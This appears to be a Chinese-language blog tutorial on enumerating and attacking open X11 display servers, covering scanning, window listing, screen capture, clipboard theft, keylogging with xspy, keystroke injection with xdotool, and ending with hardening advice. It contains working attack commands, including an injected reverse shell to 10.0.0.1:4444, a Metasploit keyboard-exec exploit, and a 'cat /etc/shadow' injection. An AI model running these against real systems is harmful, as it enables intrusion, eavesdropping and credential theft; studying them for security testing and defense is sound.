概述
X Window System(X11)是 Unix/Linux 系统的标准图形窗口系统,采用 客户端-服务器 架构:
- X Server:管理显示、键盘、鼠标,监听客户端连接
- X Client:GUI 应用程序(xterm、firefox 等),向 X Server 发送绘制请求并接收输入事件
默认监听端口:TCP 6000 + display 编号(display 0 = 6000, display 1 = 6001, …),以及 Unix socket /tmp/.X11-unix/X<display>。
一、服务发现与识别
端口扫描
nmap -sT -p 6000-6009 <target>
X11 端口特征:
PORT STATE SERVICE
6000/tcp open X11
服务版本识别
nmap -sV -p 6000 <target>
匿名访问检测
nmap -sV --script x11-access -p 6000 <target>
Metasploit 模块:
msf6 > use auxiliary/scanner/x11/open_x11
msf6 > set RHOSTS <target>
msf6 > run
脚本输出示例:
| x11-access:
| Access denied
|_ Unable to access display
| x11-access:
| Access granted
|_ display surevy
Access granted意味着服务器以-ac(disable access control)启动,或 cookie 为空/可预测。这是安全审计的强信号。
二、连接与基础信息收集
确认连接
xdpyinfo -display <target>:0
正常输出:
name of display: 192.168.1.100:0
version number: 11.0
vendor string: The X.Org Foundation
vendor release number: 12101023
X.Org version: 21.1.23
number of extensions: 22
获取屏幕信息
xrandr --display <target>:0
查看默认字体路径
xlsfonts -display <target>:0 -l | head -20
查看颜色信息
xdpyinfo -display <target>:0 | grep -i "screen\|depth\|visual"
三、窗口枚举
完整窗口树
查看所有窗口的父子关系、ID、标题、尺寸和位置:
xwininfo -root -tree -display <target>:0
输出示例:
xwininfo: Window id: 0x42 (the root window) (has no name)
Root window id: 0x42 (the root window) (has no name)
Parent window id: 0x0 (none)
3 children:
0x600001 (has no name): () 1x1+0+0 +0+0
0x400001 (has no name): () 1x1+0+0 +0+0
0x20000c "user.txt; cat flag; Press enter": ("xterm" "XTerm") 800x600+100+100 +100+100
1 child:
0x200018 (has no name): () 800x600+0+0 +101+101
关键字段含义:
| 字段 | 说明 |
|---|---|
0x20000c |
窗口 ID(Hex),用于后续操作的标识符 |
"user.txt;..." |
窗口标题,xterm 的 -e 参数内容即标题 |
"xterm" "XTerm" |
应用程序类名和实例名 |
800x600+100+100 |
窗口宽高 + 相对于父窗口的偏移 |
+100+100 |
屏幕绝对坐标 |
单窗口详细信息
xwininfo -id 0x20000c -display <target>:0
xwininfo -name "xterm" -display <target>:0
查看运行中的客户端列表
xlsclients -display <target>:0
输出:
bamuwe xterm
root Xvfb
查看根窗口属性
整个桌面环境的元信息存储在根窗口的属性中:
xprop -root -display <target>:0
常用属性:
# 当前激活的窗口
xprop -root _NET_ACTIVE_WINDOW -display <target>:0
# 桌面工作区信息
xprop -root _NET_CURRENT_DESKTOP -display <target>:0
# 所有窗口列表
xprop -root _NET_CLIENT_LIST -display <target>:0
# 窗口标题
xprop -root _NET_DESKTOP_NAMES -display <target>:0
原子属性枚举
xprop -root -display <target>:0 | grep -i "window\|client\|name"
四、输入设备枚举
列出输入设备
xinput --list --display <target>:0
输出:
⎡ Virtual core pointer id=2 [master pointer (3)]
⎜ ↳ Virtual core XTEST pointer id=4 [slave pointer (2)]
⎜ ↳ xf86-input-libinput id=6 [slave pointer (2)]
⎣ Virtual core keyboard id=3 [master keyboard (2)]
↳ Virtual core XTEST keyboard id=5 [slave keyboard (2)]
↳ xf86-input-libinput id=7 [slave keyboard (2)]
监听输入事件
xinput --test-xi2 --display <target>:0
该命令需要 X Input 2.x 扩展支持,输出实时按键和鼠标事件。
五、截屏与画面捕获
xwd:原生 X11 截图工具
# 截取整个屏幕
xwd -root -display <target>:0 > screenshot.xwd
# 截取指定窗口
xwd -id 0x20000c -display <target>:0 > window.xwd
# 静默模式(不闪烁边框)
xwd -root -silent -display <target>:0 > screenshot.xwd
格式转换(需 ImageMagick):
convert screenshot.xwd screenshot.png
xwd 转 PDF
convert screenshot.xwd screenshot.pdf
远程桌面实时监控
使用 xwatchwin 实时查看远程桌面变化:
xwatchwin <target>:0 -w 0x42
(0x42 是 root window ID,从 xwininfo -root 获取)
使用 xpra 进行远程桌面 shadow:
xpra shadow ssh://user@<target>:0
六、剪贴板操作
读取剪贴板
# 剪贴板(Ctrl+C / Ctrl+V)
xclip -display <target>:0 -selection clipboard -o
# 主选择区(鼠标选中即复制)
xclip -display <target>:0 -selection primary -o
# 次选择区(某些应用使用)
xclip -display <target>:0 -selection secondary -o
使用 xsel
xsel --display <target>:0 --clipboard --output
xsel --display <target>:0 --primary --output
写入剪贴板
echo "injected text" | xclip -display <target>:0 -selection clipboard
X11 剪贴板在匿名访问场景下是高风险的信息泄漏面,密码、SSH 密钥、API token 常出现在这里。
七、键盘输入监控
xspy:经典 X11 键盘记录器
xspy <target>:0
Kali Linux 自带,输出实时按键:
opened 192.168.1.100:0 for snooping
userBackSpace_Caps_Lock passw0rdTabReturn
xinput 事件监听
xinput --test-xi2 --display <target>:0
需要指定设备 ID:
# 先列出设备
xinput --list --display <target>:0
# 监听指定键盘设备
xinput --test --id 3 --display <target>:0
八、键盘注入
xdotool:自动按键与窗口操作
# 查找窗口
xdotool search --name "xterm" --display <target>:0
xdotool search --class "XTerm" --display <target>:0
xdotool search --all --name "flag" --display <target>:0
# 激活窗口
xdotool windowactivate --sync <WINDOW_ID> --display <target>:0
# 注入按键
xdotool type --delay 20 "cat /etc/shadow" --display <target>:0
xdotool key Return --display <target>:0
# 组合键
xdotool key Ctrl+c --display <target>:0
xdotool key Alt+F2 --display <target>:0
# 鼠标点击
xdotool mousemove --display <target>:0 100 300 click 1
注入反弹 Shell 完整示例
# 1. 找到目标窗口
WID=$(xdotool search --name "xterm" --display <target>:0 | head -1)
# 2. 激活并聚焦
xdotool windowactivate --sync $WID --display <target>:0
sleep 0.5
# 3. 注入命令
xdotool type --delay 30 "bash -c 'exec bash -i &>/dev/tcp/10.0.0.1/4444 <&1'" --display <target>:0
xdotool key Return --display <target>:0
利用 Metasploit 模块
msf6 > use exploit/unix/x11/x11_keyboard_exec
msf6 > set RHOSTS <target>
msf6 > set DISPLAY :0
msf6 > set SESSION 1
msf6 > exploit
xdotool 组合键列表
| 键名 | 说明 |
|---|---|
Return |
回车 |
BackSpace |
退格 |
Tab |
制表符 |
Escape |
退出 |
Delete |
删除 |
Up / Down / Left / Right |
方向键 |
Ctrl+c |
中断 |
Shift_L / Shift_R |
Shift |
Alt_L / Alt_R |
Alt |
Super_L / Super_R |
Windows/Command 键 |
KP_Enter |
小键盘回车 |
九、多 Display 架构与隔离
架构原理
一台机器可以运行多个 X Server 实例,每个实例对应一个 display 编号:
| Display | TCP 端口 | Unix socket | 访问方式 |
|---|---|---|---|
:0 |
6000 | /tmp/.X11-unix/X0 |
TCP + Unix |
:1 |
6001 | /tmp/.X11-unix/X1 |
TCP + Unix(默认) |
:0 无 -listen tcp |
无 | /tmp/.X11-unix/X0 |
仅 Unix |
启动无 TCP 的 Display
Xvfb :1 -screen 0 1280x720x24 -ac
# 默认只绑定 Unix socket,不监听 TCP
启动有 TCP 的 Display
Xvfb :0 -screen 0 1280x720x24 -ac -listen tcp
# 同时监听 TCP 6000 和 Unix socket
关键安全含义
- 不同 display 完全隔离,一个 display 的客户端无法看到或操作另一个 display 的窗口
- 匿名远程用户只能访问开启了
-listen tcp的 display - Unix socket 路径受文件系统权限保护,但通常
xhost +后任何本地用户可访问
枚举本地存在的 Display
# 查看所有 Unix socket
ls -la /tmp/.X11-unix/
# 查看环境变量
echo $DISPLAY
# 查看 X Server 进程
ps aux | grep -E '[X]org|[X]vfb|[X]wayland'
# 查看 Xauthority
xauth list
十、X11 认证机制
MIT-MAGIC-COOKIE-1
默认认证方式,16 字节随机 cookie 存储在 ~/.Xauthority:
# 查看当前 cookie
xauth list
# 十六进制查看 .Xauthority
xxd ~/.Xauthority
# 设置 XAUTHORITY 环境变量
export XAUTHORITY=/home/user/.Xauthority
绕过方式
-ac模式:服务器完全不验证 cookie,任何客户端可连接- Cookie 文件可读:如果
.Xauthority权限配置不当(如 644),低权限用户可以读取 - Cookie 硬编码/可预测:某些嵌入式系统使用固定 cookie
- SSH -X 转发:SSH X11 转发会创建临时的
localhost:10display,cookie 可能暴露
查看服务端认证参数
# 查看 X Server 启动参数
ps aux | grep X
# 若包含 -auth,可找到权威 cookie 文件
十一、自动化工具链
Nmap 脚本
nmap -sV --script x11-access -p 6000 <target>
Metasploit
# 扫描
auxiliary/scanner/x11/open_x11
# 键盘注入提权
exploit/unix/x11/x11_keyboard_exec
自定义自动化脚本
#!/bin/bash
# x11-enum.sh - 自动化 X11 枚举
TARGET=$1
DISPLAY=${2:-0}
echo "[*] Checking X11 access..."
xdpyinfo -display $TARGET:$DISPLAY &>/dev/null
if [ $? -ne 0 ]; then
echo "[-] Cannot connect to $TARGET:$DISPLAY"
exit 1
fi
echo "[+] Connected to $TARGET:$DISPLAY"
echo
echo "[*] Window tree:"
xwininfo -root -tree -display $TARGET:$DISPLAY 2>/dev/null | grep -E 'xterm|rxvt|gnome|kate|firefox|chrome'
echo
echo "[*] Clients:"
xlsclients -display $TARGET:$DISPLAY 2>/dev/null
echo
echo "[*] Clipboard content:"
xclip -display $TARGET:$DISPLAY -selection clipboard -o 2>/dev/null || echo "(empty)"
echo
echo "[*] Taking screenshot..."
xwd -root -display $TARGET:$DISPLAY -silent > /tmp/x11_scan.xwd 2>/dev/null
convert /tmp/x11_scan.xwd /tmp/x11_scan.png 2>/dev/null
echo "[+] Screenshot saved to /tmp/x11_scan.png"
十二、安全防护建议
服务端
- 永远不要在生产环境使用
-ac - 改用 SSH X11 转发(
ssh -X)替代裸 TCP - 使用
xhost白名单限制来源 IP - 防火墙限制 6000+ 端口仅允许信任 IP
- 使用
xauth+mcookie生成强随机 cookie
客户端
- 不连接不信任的 X Server
- 使用
ssh -Y时确认远程服务器可信 - 避免在 X11 转发会话中输入敏感信息
原文 https://blog.csdn.net/2301_79518550/article/details/162587408